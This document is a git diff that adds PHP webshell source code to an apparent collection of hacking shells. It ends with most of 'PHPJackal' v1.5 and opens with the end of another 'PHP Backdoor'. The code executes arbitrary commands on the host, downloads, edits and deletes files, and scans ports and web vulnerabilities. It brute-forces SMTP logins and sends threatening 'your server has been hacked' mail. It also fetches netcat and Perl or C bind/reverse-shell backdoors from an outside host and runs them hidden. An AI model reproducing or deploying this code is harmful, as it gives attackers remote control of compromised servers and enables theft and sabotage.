+<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
+<input type="submit" value="upl0ad!"></form><br>
+<br>
+<center>
+PHP Backdoor Version 1.5<br>
+by sirius_black / LOTFREE TEAM<br>
+Execute commands, browse the filesystem<br>
+Upload, download and delete files...<br>
+<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
+</center>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/phpjackal.php.txt b/xakep-shells/PHP/phpjackal.php.txt
new file mode 100644
index 0000000..9b3a1ac
--- /dev/null
+++ b/xakep-shells/PHP/phpjackal.php.txt
@@ -0,0 +1,1413 @@
+<?php
+#--Config--#
+$login_password= ''; //Set password
+#----------#
+error_reporting(E_ALL);
+set_time_limit(0);
+ini_set("max_execution_time","0");
+ini_set("memory_limit","9999M");
+set_magic_quotes_runtime(0);
+if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
+if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
+if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
+if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
+$_REQUEST = array_merge($_GET, $_POST);
+if (get_magic_quotes_gpc()){
+foreach ($_REQUEST as $key=>$value)
+{
+$_REQUEST[$key]=stripslashes($value);
+}
+}
+function hlinK($str=""){
+$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
+$ret=$_SERVER['PHP_SELF']."?";
+$new=explode("&",$str);
+foreach ($_GET as $key => $v){
+$add=1;
+foreach($new as $m){
+$el = explode("=", $m);
+if ($el[0]==$key)$add=0;
+}
+if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
+}
+$ret.=$str;
+return $ret;
+}
+if(!empty($login_password)){
+if(!empty($_REQUEST['fpassw'])){
+if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
+@header("Location: ".hlinK());
+}
+if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
+}
+if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=@fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=@fsockopen("udp://".$ip,$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+@fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+if (!function_exists("file_get_contents")){
+function file_get_contents($addr){
+$a = fopen($addr,"r");
+$tmp = fread($a,filesize($a));
+fclose($a);
+if($a)return $tmp;
+}
+}
+if (!function_exists("file_put_contents")){
+function file_put_contents($addr,$con){
+$a = fopen($addr,"w");
+if(!$a)return 0;
+fwrite($a,$con);
+fclose($a);
+return strlen($con);
+}
+}
+function flusheR(){
+flush();@ob_flush();
+}
+if (!empty($_REQUEST['downloaD'])){
+@ob_clean();
+$dl=$_REQUEST['downloaD'];
+$con=file_get_contents($dl);
+header("Content-type: application/octet-stream");
+header("Content-disposition: attachment; filename=\"$dl\";");
+header("Content-length: ".strlen($con));
+echo $con;
+exit;
+}
+if (!empty($_REQUEST['imagE'])){
+$img=$_REQUEST['imagE'];
+header("Content-type: imagE/gif");
+header("Content-length: ".filesize($img));
+header("Last-Modified: ".date("r",filemtime($img)));
+echo file_get_contents($img);
+exit;
+}
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
+function showsizE($size){
+if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
+elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
+elseif ($size>=1024)$size = round(($size/1024),2)." KB";
+else $size .= " B";
+return $size;
+}
+if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
+$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>";
+$et = "</td></tr></table>";
+$v="1.5";
+$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">";
+$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>";
+$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et";
+$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">";
+$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">";
+$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+function namE(){
+$name='';
+srand((double)microtime()*100000);
+for ($i=0;$i<=rand(3,10);$i++){
+$name.=chr(rand(97,122));
+}
+return $name;
+}
+function whereistmP(){
+$uploadtmp=ini_get('upload_tmp_dir');
+$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
+if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
+if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
+if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
+if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
+if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
+return ".";
+}
+function shelL($command){
+global $windows,$disablefunctions;
+$exec = '';$output= '';
+$dep[]=array('pipe','r');$dep[]=array('pipe','w');
+if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
+elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
+elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
+elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
+elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
+elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
+elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
+return $exec;
+}
+function downloadiT($get,$put){
+$fo=@strtolower(ini_get('allow_url_fopen'));
+if($fo || $fo=='on')$con=file_get_contents($get);
+else{
+$u=parse_url($get);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$url=fsockopen($host, 80, $en, $es, 12);
+fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+$tmp=$con='';
+while($tmp!="\r\n")$tmp=fgets($url);
+while(!feof($url))$con.=fgets($url);
+}
+$mk=file_put_contents($put,$con);
+if($mk)return 1;
+return 0;
+}
+function smtplogiN($addr,$user,$pass,$timeout){
+$sock=fsockopen($addr,25,$n,$s,$timeout);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,'ehlo '.namE()."\r\n");
+$res=substr(fgets($sock,512),0,1);
+if($res!='2')return 0;
+fgets($sock,512);fgets($sock,512);fgets($sock,512);
+fputs($sock,"AUTH LOGIN\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($user)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($pass)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='235')return 0;
+return 1;
+}
+function checksmtP($host,$timeout){
+$from=strtolower(namE())."@".strtolower(namE()).".com";
+$sock=@fsockopen($host,25,$n,$s,$timeout);
+if(!$sock)return -1;
+$res=substr(fgets($sock,512),0,3);
+if($res!='220')return 0;
+fputs($sock,'HELO '.namE()."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"MAIL FROM: <$from>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"DATA\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='354')return 0;
+fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+return 1;
+}
+function check_urL($url,$method,$search,$timeout){
+if(empty($search))$search='200';
+$u=parse_url($url);
+$method=strtoupper($method);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$data=(!empty($u['query']))?$u['query']:'';
+if(!empty($data))$data="?$data";
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+fputs($sock,"$method $file$data HTTP/1.0\r\n");
+fputs($sock,"Host: $host\r\n");
+if($method=='GET')fputs($sock,"\r\n");
+elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
+else return 0;
+if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
+while(!feof($sock)){
+$res=trim(fgets($sock));
+if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
+}
+fclose($sock);
+}
+return 0;
+}
+function get_sw_namE($host,$timeout){
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+$page=namE().namE();
+fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
+while(!feof($sock)){
+$con=fgets($sock);
+if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
+}
+fclose($sock);
+return -1;
+}return 0;
+}
+function snmpchecK($ip,$com,$timeout){
+$res=0;
+$n=chr(0x00);
+$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
+$com. chr(0xA0). 
+chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
+chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
+chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
+chr(0x01). chr(0x01). $n. chr(0x05). $n;
+$sock=@fsockopen("udp://$ip",161);
+socket_set_timeout($sock,$timeout);
+@fputs($sock,$packet);
+socket_set_timeout($sock,$timeout);
+$res=fgets($sock);
+fclose($sock);
+return $res;
+}
+
+$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF';
+if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");}
+$disablefunctions = @ini_get('disable_functions');
+if (!function_exists("str_repeat")){
+function str_repeat($str,$c){
+$r="";
+for($i=0; $i < $cu; $i++)$r.=$str;
+return $r;
+}
+}
+
+function brshelL(){
+global $errorbox, $windows,$et,$hcwd;
+$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
+$addr='http://netjackal.by.ru/backdoor';
+$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
+$n=namE();
+if(!$windows)$n=".$n";
+$d=whereistmP();
+$name=$d.DIRECTORY_SEPARATOR.$n;
+$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl';
+$c=($_REQUEST['C'])?1:0;
+if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){
+$port=(int)$_REQUEST['port'];
+if($windows){
+if($c){
+$name.=".exe";
+$bd=downloadiT("$addr/nc.exe",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
+}else{
+$name = $name.".pl";
+$bd=downloadiT("$addr/winbind.pl",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("perl.exe $name $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/bind.c",$name);
+if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
+}else{
+$bd=downloadiT("$addr/bind.pl",$name);
+if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &");
+echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
+}
+}
+}
+elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
+$ip=$_REQUEST['ip'];
+$port=(int)$_REQUEST['rport'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc.exe",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
+}else{
+$name = $name.".pl";
+$bd=downloadiT("$addr/winrc.pl",$name);
+shelL("attrib +H $name");
+if (!$bd)echo $error; else shelL("perl.exe $name $ip $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/rc.c",$name);
+if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
+}else{
+$bd=downloadiT("$addr/rc.pl",$name);
+if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &");
+}
+}
+echo "<font color=blue>Done!</font>";}
+else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}}
+function showimagE($img){
+echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";}
+function editoR($file){
+global $errorbox,$et,$hcwd;
+if (is_file($file)){
+if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
+if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
+$data = file_get_contents($file);
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">";
+echo htmlspecialchars($data);
+echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
+}
+else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
+}
+echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>";
+}
+function webshelL(){
+global $windows,$hcwd;
+if($windows){
+$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>";
+}
+else{
+$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>";
+if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>";
+if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>";
+}
+echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">";
+if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
+echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>";
+}
+function maileR(){
+global $msgbox,$et,$hcwd;
+$cwd= getcwd();
+if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
+$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
+if (!mail($to,$subject,$body,"From: $from"))break;
+echo "$msgbox<b>Mail sent!</b><br>$et";
+}
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et";
+}
+function scanneR(){
+global $hcwd;
+if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
+$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
+if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
+$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
+echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>";
+$start=time();
+for($i=$from;$i<=$to;$i++){
+if($tcp){
+if (checkthisporT($target,$i,$timeout)){
+$nu++;
+$ser="";
+if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
+echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
+}
+}
+if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+}
+elseif (!empty($_REQUEST['securityscanner'])){
+echo "<font color=blue>";
+$start=time();
+$from=$_REQUEST['from'];
+$to=(int)$_REQUEST['to'];
+$timeout=(int)$_REQUEST['timeout'];
+$f = substr($from,strrpos($from,".")+1);
+$from = substr($from,0,strrpos($from,"."));
+if(!empty($_REQUEST['httpscanner'])){
+echo "Loading webserver bug list...";
+flusheR();
+$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
+$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
+if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
+flusheR();
+}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
+for($i=$f;$i<=$to;$i++){
+$output=0;
+$ip="$from.$i";
+if(!empty($_REQUEST['nslookup'])){
+$hn=gethostbyaddr($ip);
+if($hn!=$ip)echo "$ip [$hn]<br>";}
+flusheR();
+if(!empty($_REQUEST['ipscanner'])){
+$port=$_REQUEST['port'];
+if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
+$open=$ser="";
+foreach($p as $po){
+$scan=checkthisporT($ip,$po,$timeout);
+if ($scan){
+$ser="";
+if($ser=getservbyport($po,"tcp"))$ser="($ser)";
+$open.=" $po$ser ";
+}
+}
+if($open){echo "$ip) Open ports:$open<br>";$output=1;}
+flusheR();
+}
+if(!empty($_REQUEST['httpbanner'])){
+$res=get_sw_namE($ip,$timeout);
+if($res){
+echo "$ip) Webserver software: ";
+if($res==-1)echo "Unknow";
+else echo $res;
+echo "<br>";
+$output=1;
+}
+flusheR();
+}
+if(!empty($_REQUEST['httpscanner'])){
+if(checkthisporT($ip,80,$timeout) && !empty($file)){
+$admin=array('/admin/','/adm/');
+$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
+$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
+$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
+foreach ($file as $v){
+$vuln=array();
+$v=trim($v);
+if(!$v || $v{0}=='#')continue;
+$v=str_replace('","','^',$v);
+$v=str_replace('"','',$v);
+$vuln=explode('^',$v);
+$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
+if(strstr($page,'@CGIDIRS'))
+foreach($cgi as $cg){
+$cqich=str_replace('@CGIDIRS',$cg,$page);
+$url="http://$ip$cqich";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@ADMINDIRS'))
+foreach ($admin as $cg){
+$adminch=str_replace('@ADMINDIRS',$cg,$page);
+$url="http://$ip$adminch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@USERS'))
+foreach ($users as $cg){
+$userch=str_replace('@USERS',$cg,$page);
+$url="http://$ip$userch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@NUKE'))
+foreach ($nuke as $cg){
+$nukech=str_replace('@NUKE',$cg,$page);
+$url="http://$ip$nukech";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+else{
+$url="http://$ip$page";
